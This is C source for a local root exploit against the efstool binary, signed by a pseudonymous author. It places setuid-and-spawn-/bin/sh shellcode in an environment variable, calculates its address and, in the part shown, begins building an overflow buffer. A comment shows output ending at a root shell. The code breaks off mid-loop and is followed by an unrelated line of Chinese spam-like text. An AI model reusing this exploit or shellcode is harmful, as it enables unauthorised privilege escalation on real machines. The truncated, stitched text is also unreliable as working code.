/* EFStool local exploit * (no brute force capabilities..cuz its umm..*local*) * * e-mail: Hi_Tech_Asslemon@hairdresser.net * * coded by: Hi_Tech_Asslemon */ /* $ ./efstrip EFStrip -- ./go efstool exploit -- coded by: Hi_Tech_Asslemon Shellcode at: 0xbfffffbd (omfg it's magic@!@!@!) sh-2.05# */ #include #include #include #define PATH "/opt/gnome/bin/efstool" unsigned char code[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x50\x50\x68\x6e" "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x54\x5b\x89\xe1\x31\xd2\xb0" "\x0c\x01\xc1\x89\x19\xfe\xc8\xcd\x80"; extern char **environ; int main(int argc, char **argv) { unsigned long ret; unsigned char *p; unsigned char *run[3]; unsigned char buf[3000]; /* tnx str9 */ unsigned int i; p=NULL; if((p=getenv("FOO"))==NULL) { if(setenv("FOO",code,1)==-1) exit(1); if(execve(argv[0],argv,environ)) exit(1); } printf("EFStrip -- ./go efstool exploit -- coded by: Hi_Tech_Asslemon\n\n"); ret=(long)p; ret+=(strlen(argv[0])-strlen(PATH)); printf("Shellcode at: %p (omfg it's magic@!@!@!)\n",ret); for(i=0;i

亚洲欧美在线